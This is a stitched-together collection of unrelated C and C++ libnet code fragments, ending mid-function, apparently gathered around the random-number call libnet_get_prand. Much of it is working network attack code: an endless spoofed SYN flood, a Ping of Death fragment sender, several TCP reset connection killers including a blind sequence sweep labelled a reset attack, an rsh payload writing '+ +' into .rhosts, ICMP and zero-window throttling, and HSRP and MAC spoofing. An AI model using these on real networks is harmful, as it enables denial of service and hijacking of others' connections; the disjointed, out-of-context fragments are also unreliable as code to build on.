libnet_ptag_t
build_pkt (libnet_t * l, u_long * seq, struct libnet_in6_addr src,
struct libnet_in6_addr victim)
{
libnet_ptag_t ip_tag, tcp_tag;
ip_tag = tcp_tag = LIBNET_PTAG_INITIALIZER;
libnet_seed_prand (l);
*seq = (u_long) libnet_get_prand (LIBNET_PRu32);
tcp_tag = libnet_build_tcp (0,
0,
*seq,
libnet_get_prand (LIBNET_PRu32),
TH_SYN,
libnet_get_prand (LIBNET_PRu16),
0, 0, LIBNET_TCP_H, NULL, 0, l, 0);
ip_tag = libnet_build_ipv6 (0,
0,
LIBNET_TCP_H,
IPPROTO_TCP, 64, src, victim, NULL, 0, l, 0);
return tcp_tag;
}
void
send_tcp_pkts (libnet_t * l, libnet_plist_t * plist, libnet_ptag_t tcp_tag,
u_long seq)
{
int i;
u_short bport, eport;
while (libnet_plist_chain_next_pair (plist, &bport, &eport)
&& (bport <= eport) && (bport))
for (i = bport; i <= eport; i++)
{
tcp_tag = libnet_build_tcp (libnet_get_prand (LIBNET_PRu16),
i,
seq,
libnet_get_prand (LIBNET_PRu32),
TH_SYN,
libnet_get_prand (LIBNET_PRu16),
0, 0, LIBNET_TCP_H, NULL, 0, l, tcp_tag);
libnet_write (l);
usleep (1); /* kernel buffers will prevent high rate packet injection
* unless we sleep for a while (1usec is enough)
* There are cleaner ways of doing this... see libdnet
*/
}
}
void tcp_answer_ack(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt)
{
struct libnet_ipv4_hdr *ip;
struct libnet_tcp_hdr *tcp;
u_int32_t seq, win, ack;
int len;
libnet_t *libnet;
libnet = (libnet_t *)user;
pkt += pcap_off;
len = pcap->caplen - pcap_off;
ip = (struct libnet_ipv4_hdr *)pkt;
tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2));
seq = ntohl(tcp->th_ack);
ack = ntohl(tcp->th_seq) + 1;
win = ntohs(tcp->th_win);
libnet_clear_packet(libnet);
libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport),
seq, ack, TH_ACK, win, 0, 0, LIBNET_TCP_H,
NULL, 0, libnet, 0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, ip->ip_dst.s_addr,
ip->ip_src.s_addr, NULL, 0, libnet, 0);
if (libnet_write(libnet) < 0)
warn("writing ACK failed");
}
int main() {
int i;
char errbuf[LIBNET_ERRBUF_SIZE];
/* It's a good idea to have the payload as an array of
* * bytes. If yours isn't, make a pointer to it and cast
* * it.*/
u_int8_t payload[3000];
l = libnet_init(LIBNET_RAW4, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed (raw4, 1st call): %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Generating random payload */
libnet_seed_prand(l);
for (i = 0; i < sizeof(payload); i++) {
payload[i] = libnet_get_prand(LIBNET_PR8);
}
/* Building and sending the fragments */
frag_and_send(payload, sizeof(payload));
libnet_destroy(l);
return 0;
}
static void
send_icmp_frag_needed(libnet_t *l, struct libnet_ipv4_hdr *ip)
{
struct libnet_icmpv4_hdr *icmp;
int len;
len = (ip->ip_hl * 4) + 8;
icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H);
icmp->icmp_type = ICMP_UNREACH;
icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
icmp->hun.frag.pad = 0;
icmp->hun.frag.mtu = htons(MIN_MTU);
memcpy((u_char *)icmp + LIBNET_ICMPV4_MASK_H, (u_char *)ip, len);
len += LIBNET_ICMPV4_MASK_H;
libnet_build_ipv4(LIBNET_IPV4_H + len, 4,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP,
0, ip->ip_dst.s_addr, ip->ip_src.s_addr,
(u_int8_t *) icmp, len, l, 0);
if (libnet_write(l) != len)
warn("write");
fprintf(stderr, "%s > %s: icmp: ",
libnet_addr2name4(ip->ip_dst.s_addr, 0),
libnet_addr2name4(ip->ip_src.s_addr, 0));
fprintf(stderr, "%s unreachable - need to frag (mtu %d)\n",
libnet_addr2name4(ip->ip_src.s_addr, 0), MIN_MTU);
}
static void
send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip,
struct libnet_tcp_hdr *tcp)
{
int len;
ip->ip_hl = 5;
ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H);
ip->ip_id = libnet_get_prand(LIBNET_PRu16);
memcpy(buf, (u_char *)ip, LIBNET_IPV4_H);
tcp->th_off = 5;
tcp->th_win = htons(MIN_WIN);
memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H);
libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H);
len = LIBNET_IPV4_H + LIBNET_TCP_H;
if (libnet_write_raw_ipv4(l, buf, len) != len)
warn("write");
fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n",
libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport),
libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport),
ntohl(tcp->th_ack), 1);
}
static void
send_icmp_source_quench(libnet_t *l, struct libnet_ipv4_hdr *ip)
{
struct libnet_icmpv4_hdr *icmp;
int len;
len = (ip->ip_hl * 4) + 8;
icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H);
icmp->icmp_type = ICMP_SOURCEQUENCH;
icmp->icmp_code = 0;
memcpy((u_char *)icmp + LIBNET_ICMPV4_ECHO_H, (u_char *)ip, len);
len += LIBNET_ICMPV4_ECHO_H;
libnet_build_ipv4(LIBNET_IPV4_H + len, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP,
0, ip->ip_dst.s_addr, ip->ip_src.s_addr,
(u_int8_t *) icmp, len, l, 0);
if (libnet_write(l) != len)
warn("write");
fprintf(stderr, "%s > %s: icmp: source quench\n",
libnet_addr2name4(ip->ip_dst.s_addr, 0),
libnet_addr2name4(ip->ip_src.s_addr, 0));
}
uint16_t buildICMP_h(libnet_t *l, uint32_t dip, uint8_t *PAYLOAD)
{
uint16_t seqn, id, bytes_w;
libnet_seed_prand(l);
id= (uint16_t)libnet_get_prand(LIBNET_PR16);
seqn =1;
icmp_t = libnet_build_icmpv4_echo(ICMP_ECHO,
0, 0, id, seqn, PAYLOAD, PAYLOAD_L, l, icmp_t);
if(icmp_t == -1)
{
fprintf(stderr,"libnet_build_ethernet() failed: %s\n",errbuf);
goto bad;
}
ip_t = libnet_autobuild_ipv4(
LIBNET_IPV4_H+LIBNET_ICMPV4_ECHO_H+PAYLOAD_L,
IPPROTO_ICMP, dip,l);
if(ip_t == -1)
{
fprintf(stderr,"libnet_autobuild_ipv4() failed: %s\n",errbuf);
goto bad;
}
bytes_w = libnet_write(l);
if(bytes_w == -1)
{
fprintf(stderr,"libnet_write() failed: %s\n",errbuf);
goto bad;
}
return 1;
bad:
return -1;
}
int main (int argc, char **argv)
{
unsigned long fakesrc, target;
unsigned char *buf;
unsigned char *data;
int sock, i, flags, offset, len;
if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1)))
{
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
exit(1);
}
if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
{
perror("raw sock");
exit(1);
}
/* get random src addr. */
libnet_seed_prand();
fakesrc = libnet_get_prand(LIBNET_PRu32);
buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H);
data = (unsigned char *)malloc(FRAG_LEN);
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN))
{
offset = i;
flags = 0;
if (offset < 65120)
{
flags = IP_MF;
len = FRAG_LEN;
}
else len = 410; /* for total reconstructed len of 65538 */
/* make IP header. */
libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666,
flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target,
NULL, 0, buf);
/* make ICMP packet. */
libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H);
/* calculate ICMP checksum. */
libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len);
/* send it. */
libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len);
/* tcpdump-style jonks. */
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0),
argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : "");
}
free(buf);
return (EXIT_SUCCESS);
}
static void
tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt)
{
struct libnet_ipv4_hdr *ip;
struct libnet_tcp_hdr *tcp;
char ctext[64];
u_int32_t seq, win;
int i, len;
libnet_t *l;
l = (libnet_t *)user;
pkt += pcap_off;
len = pcap->caplen - pcap_off;
ip = (struct libnet_ipv4_hdr *)pkt;
if (ip->ip_p != IPPROTO_TCP)
return;
tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2));
if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST))
return;
seq = ntohl(tcp->th_ack);
win = ntohs(tcp->th_win);
snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:",
libnet_addr2name4(ip->ip_src.s_addr, LIBNET_DONT_RESOLVE),
ntohs(tcp->th_sport),
libnet_addr2name4(ip->ip_dst.s_addr, LIBNET_DONT_RESOLVE),
ntohs(tcp->th_dport));
for (i = 0; i < Opt_severity; i++) {
seq += (i * win);
libnet_clear_packet(l);
libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport),
seq, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H,
NULL, 0, l, 0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, ip->ip_dst.s_addr,
ip->ip_src.s_addr, NULL, 0, l, 0);
if (libnet_write(l) < 0)
warn("write");
fprintf(stderr, "%s R %lu:%lu(0) win 0\n",
ctext,
(unsigned long) seq,
(unsigned long) seq);
}
++kill_counter;
if (Opt_max_kill && kill_counter >= Opt_max_kill) {
pcap_breakloop(pd);
}
}
static void ip_validatedata(void)
{
struct sockaddr_in sin;
/* validation tests */
if (iphdr.ip_src.s_addr == 0)
iphdr.ip_src.s_addr = (u_int32_t)libnet_get_prand(PRu32);
if (iphdr.ip_dst.s_addr == 0)
iphdr.ip_dst.s_addr = (u_int32_t)libnet_get_prand(PRu32);
/* if the user has supplied a source hardware addess but not a device
* try to select a device automatically
*/
if (memcmp(etherhdr.ether_shost, zero, 6) && !got_link && !device)
{
if (libnet_select_device(&sin, &device, (char *)&errbuf) < 0)
{
printf("ERROR: Device not specified and unable to automatically "
"select a device.\n");
ip_exit(1);
}
else
{
#ifdef DEBUG
printf("DEBUG: automatically selected device: "
" %s\n", device);
#endif
got_link = 1;
}
}
/* if a device was specified and the user has not specified a source
* hardware address, try to determine the source address automatically
*/
if (got_link)
{
if ((nemesis_check_link(ðerhdr, device)) < 0)
{
fprintf(stderr, "ERROR: cannot retrieve hardware address of "
"%s.\n", device);
ip_exit(1);
}
}
return;
}
int8_t hsrp_init_attribs( struct term_node *node )
{
struct hsrp_data *hsrp_data;
u_int32_t lbl32;
hsrp_data = node->protocol[PROTO_HSRP].tmp_data;
/* HSRP stuff */
hsrp_data->version = HSRP_DFL_VERSION;
hsrp_data->opcode = HSRP_DFL_TYPE;
hsrp_data->state = HSRP_DFL_STATE;
hsrp_data->hello_time = HSRP_DFL_HELLO_TIME;
hsrp_data->hold_time = HSRP_DFL_HOLD_TIME;
hsrp_data->priority = HSRP_DFL_PRIORITY;
hsrp_data->group = HSRP_DFL_GROUP;
hsrp_data->reserved = HSRP_DFL_RESERVED;
memset( (void *)hsrp_data->authdata, 0, HSRP_AUTHDATA_LENGTH );
if ( strlen( HSRP_DFL_AUTHDATA ) < HSRP_AUTHDATA_LENGTH )
memcpy( (void *)hsrp_data->authdata, (void *)HSRP_DFL_AUTHDATA, strlen( HSRP_DFL_AUTHDATA ) );
else
memcpy( (void *)hsrp_data->authdata, (void *)HSRP_DFL_AUTHDATA, HSRP_AUTHDATA_LENGTH );
lbl32 = libnet_get_prand(LIBNET_PRu32);
memcpy((void *)&hsrp_data->virtual_ip, (void *) &lbl32, 4);
hsrp_data->sport = HSRP_DFL_PORT;
hsrp_data->dport = HSRP_DFL_PORT;
lbl32 = libnet_get_prand(LIBNET_PRu32);
memcpy((void *)&hsrp_data->sip, (void *)&lbl32, sizeof(u_int32_t));
hsrp_data->dip = ntohl(inet_addr("224.0.0.2"));
attack_gen_mac(hsrp_data->mac_source);
hsrp_data->mac_source[0] &= 0x0E;
parser_vrfy_mac("01:00:5e:00:00:02",hsrp_data->mac_dest);
return 0;
}
void send_rsh_command(u_int32_t ack)
{
u_int32_t seq = libnet_get_prand(LIBNET_PRu16);;
char payload[] = "0\0tsutomu\0tsutomu\0echo + + >> .rhosts";
/* send syn */
send_packet("172.16.1.1", 1022, 514, seq, 0, TH_SYN, NULL, 0);
/* send ack with rsh command */
send_packet("172.16.1.1", 1022, 514, seq + 1, ack, TH_ACK | TH_PUSH,\
(u_int8_t*) payload, (u_int32_t) sizeof(payload));
}
void send_syns(libnet_t *libnet, u_int32_t source_addr, u_int32_t target_addr, unsigned int port, useconds_t delay) {
libnet_seed_prand(libnet);
for(;;) {
libnet_clear_packet(libnet);
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), port,
libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32),
TH_SYN, 8192, 0, 0, LIBNET_TCP_H,
NULL, 0, libnet, 0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, source_addr,
target_addr, NULL, 0, libnet, 0);
if (libnet_write(libnet) < 0)
warn("writing SYN failed");
usleep(delay);
}
}
int init(void) {
/* Ethernet header */
etherhdr.ether_type = ETHERTYPE_IP; /* Ethernet type IP */
memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */
memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */
/* IP header */
memset(&iphdr.ip_src.s_addr, 0, 4); /* IP source address 0.0.0.0
* (pretend to be proxy to
* avoid being elected as master) */
inet_aton(MCAST_ALL_HOSTS, &iphdr.ip_dst); /* IP destination address */
iphdr.ip_tos = 0; /* IP type of services */
iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */
iphdr.ip_p = IPPROTO_IGMP; /* IP protocol IGMP */
iphdr.ip_off = 0; /* IP fragmentation offset */
iphdr.ip_ttl = 1; /* IP TTL - set to 1 purposely */
/* IGMP header */
igmphdr.igmp_type = IGMP_MEMBERSHIP_QUERY; /* IGMP type */
igmphdr.igmp_code = 0; /* IGMP code */
inet_aton(MCAST_MDNS, &igmphdr.igmp_group); /* IGMP group address */
/* Create packet */
linkint = libnet_open_link_interface(LINK_INTERFACE, errbuf);
if (linkint == NULL) {
return -1;
}
igmp_packetlen = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_IGMP_H;
if (libnet_init_packet(igmp_packetlen, &pkt) == -1) {
return -1;
}
libnet_build_ethernet(etherhdr.ether_dhost, etherhdr.ether_shost,
ETHERTYPE_IP, NULL, 0, pkt);
libnet_build_ip(LIBNET_IGMP_H, iphdr.ip_tos, iphdr.ip_id, iphdr.ip_off,
iphdr.ip_ttl, iphdr.ip_p, iphdr.ip_src.s_addr, iphdr.ip_dst.s_addr,
NULL, 0, pkt + LIBNET_ETH_H);
libnet_build_igmp(igmphdr.igmp_type, igmphdr.igmp_code,
igmphdr.igmp_group.s_addr, NULL, 0,
pkt + LIBNET_ETH_H + LIBNET_IP_H);
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IGMP, LIBNET_IGMP_H);
}
// Initialise fake TCP session state
int init_fake_session_state( FakeSessionState* fakeSess )
{
// Init libnet context
fakeSess->ln = libnet_init(
LIBNET_LINK,
config.cap[capindex]->dst_interface,
errbuf.libnet
);
if( fakeSess->ln == NULL )
{
if (config.daemon)
syslog(LOG_ERR, "error opening libnet context: %s", errbuf.libnet);
else
fprintf(stderr, "Error opening libnet context: %s.\n", errbuf.libnet);
return( -1 );
}
if( libnet_seed_prand( fakeSess->ln ) == -1 )
{
if (config.daemon)
syslog(LOG_ERR, "error seeding libnet prand: %s", errbuf.libnet);
else
fprintf(stderr, "Error seeding libnet prand: %s.\n", errbuf.libnet);
libnet_destroy( fakeSess->ln );
return( -1 );
}
// Initialise other member variables
fakeSess->handshakeSent = 0;
fakeSess->clientSeq = libnet_get_prand (LIBNET_PRu16);
fakeSess->serverSeq = libnet_get_prand (LIBNET_PRu16);
return( 1 );
}
static void ip_initdata(void)
{
/* defaults */
etherhdr.ether_type = ETHERTYPE_IP; /* Ethernet type IP */
memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */
memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */
memset(&iphdr.ip_src.s_addr, 0, 4); /* IP source address */
memset(&iphdr.ip_dst.s_addr, 0, 4); /* IP destination address */
iphdr.ip_tos = 0; /* IP type of service */
iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */
iphdr.ip_off = 0; /* IP fragmentation offset */
iphdr.ip_ttl = 255; /* IP TTL */
iphdr.ip_p = 0; /* IP protocol */
pd.file_mem = NULL;
pd.file_s = 0;
ipod.file_mem = NULL;
ipod.file_s = 0;
return;
}
//===============================
//I tried to do this same concept using LIBNET_RAW4 instead of LIBNET_LINK so
//I wouldn't have to worry about the ethernet header. But something weird happens when I
//try to do this. If there is already an established connection.. e.g. 70.116.23.2:3779 to
//192.168.0.2:6112, if we send the packet using raw4, in tcpdump we get
//70.116.23.2:1024 --> 192.168.0.2:6112. I am really not sure why it won't send the correct
//source port if that connection is already established, but using LIBNET_LINK seems to not
//have this problem. I believe it is a kernel related issue.
void TcpKill::Execute(const wxString &sIp, u_int nPort)
{
char szErrBuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip;
libnet_ptag_t tcp;
wxString sSniffDevice = CONFIG(wxString, "Network/SniffDevice");
wxString sGameHost = CONFIG(wxString, "Network/GameHost");
int nGamePort = CONFIG(int, "Network/GamePort");
shared_ptr<NodeInfo> pNodeInfo = Info::Get()->GetNodeInfo(sIp, nPort);
if (!pNodeInfo) {
//Interface::Get()->Output(wxString::Format("Can't find %s:%d in net info map.", m_sIp.c_str(), m_nPort), OUTPUT_ERROR);
return;
}
NetInfo &netInfo = Info::Get()->GetNetInfo();
//This is pretty inefficient since I constantly init libnet and destroy it. It would be better
//if we could init once and just keep changing the sequence number and destination ip.
for (u_int x = 0; x < m_nSeverity; x++) {
u_int32_t seq_out = pNodeInfo->last_sentack;
libnet_t *pLibnet = libnet_init(LIBNET_LINK, const_cast<char *>(sSniffDevice.c_str()), szErrBuf);
libnet_seed_prand(pLibnet);
tcp = libnet_build_tcp(nPort, nGamePort,
seq_out, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, pLibnet, 0);
u_long src_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sIp.c_str()), LIBNET_DONT_RESOLVE);
u_long dst_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sGameHost.c_str()), LIBNET_DONT_RESOLVE);
ip = libnet_build_ipv4(sizeof(net_ip) + sizeof(net_tcp), 0,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0,
src_ip, dst_ip, NULL, 0, pLibnet, 0);
libnet_autobuild_ethernet(netInfo.gamehost_ether, ETHERTYPE_IP, pLibnet);
libnet_write(pLibnet);
libnet_destroy(pLibnet);
}
}
int main(int argc, char **argv)
{
char *srv_addr;
char *srv_port;
char *cli_addr;
char *cli_port;
libnet_t *attack;
u_int32_t srv_ip_addr, cli_ip_addr, seq_num;
libnet_ptag_t ip_tag, tcp_tag;
char *error_msg = "Error";
if(argc >= 2) {
cli_addr = argv[1];
} else {
cli_addr = "127.0.0.1";
}
if(argc >= 3) {
cli_port = argv[2];
} else {
cli_port = "10001";
}
if (argc >= 4) {
srv_addr = argv[3];
} else {
srv_addr = "127.0.0.1";
}
if (argc >= 5) {
srv_port = argv[4];
}
else {
srv_port = "9999";
}
seq_num = 1200000000;
ip_tag=0;
tcp_tag=0;
attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed
srv_ip_addr = libnet_name2addr4(attack, srv_addr, LIBNET_DONT_RESOLVE);
cli_ip_addr = libnet_name2addr4(attack, cli_addr, LIBNET_DONT_RESOLVE);
//atoi(cli_port);
//atoi(srv_port);
libnet_build_tcp( atoi(cli_port), /* src port */ //problem
atoi(srv_port), /* destination port */ //problem
seq_num, /* sequence number */
0, /* acknowledgement */
TH_RST, /* control flags */
7, /* window */
0, /* checksum - 0 = autofill */
0, /* urgent */
LIBNET_TCP_H, /* header length */
NULL, /* payload */
0, /* payload length */
attack, /* libnet context */
tcp_tag); /* protocol tag */
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, /* length */
0, /* TOS */
libnet_get_prand (LIBNET_PRu16), /* IP ID */
0, /* frag offset */
127, /* TTL */
IPPROTO_TCP, /* upper layer protocol */
0, /* checksum, 0=autofill */
cli_ip_addr, /* src IP */
srv_ip_addr, /* dest IP */
NULL, /* payload */
0, /* payload len */
attack, /* libnet context */
ip_tag); /* protocol tag */
printf("starting reset attack on TCP connection: client %s:%s, server %s:%s\n",
cli_addr, cli_port, srv_addr, srv_port);
printf("Libnet value: %d: %u\nServer Port: %s\nClient Port: %s", libnet_write(attack), seq_num, srv_port, cli_port);
//libnet_write(attack)
libnet_destroy(attack);
for(seq_num = (1200000000-16384); seq_num>0; seq_num=(seq_num-16384))
{
attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed
libnet_build_tcp(atoi(cli_port), atoi(srv_port), seq_num,
0, TH_RST, 7,0, 0, LIBNET_TCP_H, NULL, 0, attack, tcp_tag);
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, 0, libnet_get_prand (LIBNET_PRu16), 0, 127, IPPROTO_TCP,
0, cli_ip_addr, srv_ip_addr, NULL, 0, attack, ip_tag);
//libnet_write(attack);
//printf("Libnet value: %d: %d\n", libnet_write(attack), seq_num);
libnet_write(attack);
libnet_destroy(attack);
}
printf("Test3"); //attack successful
//libnet_destroy(attack);
return 0;
}
int
main(int argc, char **argv)
{
int i, j;
printf("Psuedorandom number generation\n");
printf("For each trial, 1000 numbers will be generated\n");
libnet_seed_prand();
printf("\n\nPress return for trial 1 (0 - 1)\n\n");
getc(stdin);
for (i = 1000; i; i--)
{
printf("%ld ", libnet_get_prand(LIBNET_PR2));
}
printf("\n\nPress return for trial 2 (0 - 255)\n\n");
getc(stdin);
for (i = 1000; i; i--)
{
printf("%3ld ", libnet_get_prand(LIBNET_PR8));
}
printf("\n\nPress return for trial 3 (0 - 32767)\n\n");
getc(stdin);
for (j = 13, i = 1000; i; i--, j--)
{
if (!j)
{
printf("\n");
j = 13;
}
printf("%5ld ", libnet_get_prand(LIBNET_PR16));
}
printf("\n\nPress return for trial 4 (0 - 65535)\n\n");
getc(stdin);
for (j = 13, i = 1000; i; i--, j--)
{
if (!j)
{
printf("\n");
j = 13;
}
printf("%5ld ", libnet_get_prand(LIBNET_PRu16));
}
printf("\n\nPress return for trial 5 (0 - 2147483647)\n\n");
getc(stdin);
for (j = 7, i = 1000; i; i--, j--)
{
if (!j)
{
printf("\n");
j = 7;
}
printf("%10ld ", libnet_get_prand(LIBNET_PR32));
}
printf("\n\nPress return for trial 6 (0 - 4294967295)\n\n");
getc(stdin);
for (j = 7, i = 1000; i; i--, j--)
{
if (!j)
{
printf("\n");
j = 7;
}
printf("%10ld ", libnet_get_prand(LIBNET_PRu32));
}
printf("\nCompleted\n");
return (EXIT_SUCCESS);
}
void PcapGen::send_tcp_packet(
const TcpState& from, const TcpState& to,
uint8_t control,
const uint8_t* data, size_t size)
{
if (!lnet_)
return;
libnet_build_tcp(from.port(), // sp
to.port(), // dp
from.seq(), // seq
control & TH_ACK ? from.ack() : 0, // ack
control, // control
from.win(), // win
0, // sum
0, // urg
LIBNET_TCP_H + size, // len
data,
(uint32_t)size,
lnet_.get(),
0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H + size, // ip_len
0, // tos
libnet_get_prand(LIBNET_PRu32), // id
0, // frag
64, // ttl
IPPROTO_TCP,
0, // sum
from.ip_addr(), // src
to.ip_addr(), // dst
0,
0,
lnet_.get(),
0);
libnet_build_ethernet(from.mac_addr(),
to.mac_addr(),
ETHERTYPE_IP,
0,
0,
lnet_.get(),
0);
// see libnet_write() source code; calling internal function here
uint32_t packet_size;
uint8_t *packet_data;
auto c = libnet_pblock_coalesce(lnet_.get(), &packet_data, &packet_size);
if (c == -1) {
libnet_clear_packet(lnet_.get());
return;
}
pcap_pkthdr packet_hdr;
packet_hdr.ts.tv_sec = 0;
packet_hdr.ts.tv_usec = 0;
packet_hdr.len = packet_size;
packet_hdr.caplen = packet_size;
pcap_dump(reinterpret_cast<u_char *>(pcap_dump_.get()),
&packet_hdr, packet_data);
// see libnet_write() source code
if (lnet_->aligner > 0) {
packet_data -= lnet_->aligner;
}
free(packet_data);
libnet_clear_packet(lnet_.get());
}
int main(int argc, char *argv[])
{
int c, i;
u_char *cp;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t tcp;
struct libnet_stats ls;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char opt[20];
char errbuf[LIBNET_ERRBUF_SIZE];
FILE *dmf;
char *dms;
int pay_s;
char *dmfn = "kw.txt";
char *paybuf, *pp;
u_char bt;
char linebuf[MAXTEXT];
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
dst_ip = libnet_get_prand(LIBNET_PRu32);
src_ip = libnet_get_prand(LIBNET_PRu32);
src_prt = libnet_get_prand(LIBNET_PRu16);
dst_prt = 80; /* http */
while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
dst_prt = (u_short)atoi(optarg);
printf("Dest port: %d\n", dst_prt);
break;
case 'f':
dmfn = optarg;
printf("File name: %s\n", dmfn);
break;
default:
exit(EXIT_FAILURE);
}
}
/* Read the keywords, dest IPs, src IPs , and construct http payload */
if( (dmf = fopen(dmfn, "r")) == NULL) {
fprintf(stderr, "Error opening the content file %s \n", dmfn);
exit(1);
} /* end if */
printf("Reading content ...\n");
i = 0;
while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) )
{
linebuf[i++] = c;
}
fclose(dmf);
linebuf[i] = '\0';
paybuf = linebuf;
dms = (char *)malloc(strlen(paybuf)+1); /* alloc mem */
strcpy(dms, paybuf);
pay_s = strlen(dms);
/* ===== for message body debugging */
printf("Content read:\n");
for (i=0; i < pay_s; i++) {
bt = *(dms + i);
printf(" %02X", bt);
}
printf("\n");
/*=== */
/* Building TCP */
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
0x18, /* (PSH, ACK) */
libnet_get_prand(LIBNET_PRu16), /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s, /* packet length */
dms, /* payload */
pay_s, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Building IP */
ip = libnet_build_ipv4(
LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Write it to the wire. */
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
} else {
/* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
}
/* usleep(20); slow down to conserve bandwidth */
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
/*
* macof.c
* gen_mac from Dug Song's macof-1.1 C port
*/
void
attack_gen_mac(u_int8_t *mac)
{
*((in_addr_t *)mac) = libnet_get_prand(LIBNET_PRu32);
